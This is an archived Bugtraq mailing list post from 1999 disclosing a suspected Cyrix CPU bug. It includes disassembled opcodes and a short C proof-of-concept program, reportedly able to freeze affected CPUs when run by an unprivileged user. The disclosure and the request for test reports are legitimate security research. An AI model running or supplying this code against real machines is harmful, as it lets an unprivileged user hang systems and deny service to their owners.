Bugtraq mailing list archives
Cyrix bug: freeze in hell, badboy
From: tech.support () REDESTB ES (Ragnar Hojland Espinosa)
Date: Thu, 4 Feb 1999 16:50:21 +0100
I emailed Cyrix a few months ago, and even managed to get a "oh, we will look at it" thanks to Rafael Reilova, but that was it till today. A couple of people did report it, effectively, froze (most of) their Cyrix CPUs while running the opcodes below as non priviledged user. While I don't have the enough knowledge to assure this _is_ a CPU bug, it certainly looks like one to me (NO_LOCK isn't a workaround, btw). 0x804a368 <the_data>: cwtl 0x804a36a <the_data+2>: orl $0xe6ebe020,%eax 0x804a36f <the_data+7>: jle 0x804a368 <the_data> Here is the code (tested with linux, any version): /* Please compile without optimizations */ unsigned char the_data[] = { 62, 152, 13, 32, 224, 235, 230, 126, 247 }; void (*badboy)(); int main (int argc, char **argv) { badboy = (void(*)())(the_data); asm ("movl badboy,%eax"); asm ("call *%eax"); return 0; } If you try it, please send me your /proc/{cpuinfo,version} and if it freezes or not. -- ____/| Ragnar Hojland (ragnar () lightside ddns org) Fingerprint 94C4B \ o.O| 2F0D27DE025BE2302C =(_)= "Thou shalt not follow the NULL pointer for 104B78C56 B72F0822 U chaos and madness await thee at its end." hkp://keys.pgp.com
Current thread:
- Linux /usr/bin/lpc overflow xnec () INFERNO TUSCULUM EDU (Feb 02)
- <Possible follow-ups>
- Re: Linux /usr/bin/lpc overflow Denis Bucher (Feb 03)
- Cyrix bug: freeze in hell, badboy Ragnar Hojland Espinosa (Feb 04)
- Re: Cyrix bug: freeze in hell, badboy Aaron Lehmann (Feb 05)
- Re: Linux /usr/bin/lpc overflow Simon Karpen (Feb 04)
- Cyrix bug: freeze in hell, badboy Ragnar Hojland Espinosa (Feb 04)
- Re: Linux /usr/bin/lpc overflow -*- Chotaire -*- (Feb 04)